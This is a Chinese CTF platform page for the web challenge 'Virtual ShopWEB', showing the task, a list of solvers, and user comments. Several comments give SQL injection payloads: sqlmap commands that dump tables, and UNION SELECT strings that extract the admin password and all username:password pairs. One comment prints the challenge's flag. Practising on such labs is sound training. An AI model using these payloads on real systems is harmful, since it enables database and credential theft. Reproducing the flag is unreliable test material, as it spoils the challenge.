Virtual ShopWEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
heyile
一血奖励:
0金币
解 决:
280
提 示:
描 述:
So, let's see if you can retrieve the `password` of the admin which\
\ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\
\ F100w"
评分(0)
暂无评分
解题动态

19513396653 攻破了该题 18小时前

slience 攻破了该题 1天前

minhaf 攻破了该题 9天前

lne是1呢 攻破了该题 10天前

qiaoooo 攻破了该题 12天前

蟹堡王第一厨师长 攻破了该题 14天前

n0th1n9 攻破了该题 16天前

33538626867 攻破了该题 17天前

fatcat 攻破了该题 18天前

ymkiras 攻破了该题 25天前

下雨天y 攻破了该题 1月前

Q2017azaz 攻破了该题 1月前

Waitcat 攻破了该题 1月前

MoCaser 攻破了该题 1月前

snoway34 攻破了该题 1月前

gusye 攻破了该题 1月前

梦游的小狐狸 攻破了该题 1月前

czg9000 攻破了该题 1月前


wangif424 攻破了该题 1月前

评论
欧尼酱001 6月前
举报
1、将请求包保存为1.txt 2、python3 sqlmap.py -r 1.txt --batch --tables 3、python3 sqlmap.py -r 1.txt --batch -T users --dump 即可跑出表字段:shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}
WCRH 5月前
举报
这又不是post请求,你还保存上txt了
.⎛⎝•̀ω•́⎠⎞. 1年前
举报
只用sqlmap就可以做出来,很简单的一个注入
FADogeCTF 1年前
举报
union查询
xiaobai568 1年前
举报
前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了
JJhello 1年前
举报
sqlmap即可
chaoge 1年前
举报
sqlite,弄了半天认为是MySQL呢。
justsosoloveyou 1年前
举报
' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+
SS3B 1年前
举报
sqlmap一下子就出来了
hopeinhand 1年前
举报
联合查询注入,表名、列名、用户名全给了,都没啥好说的了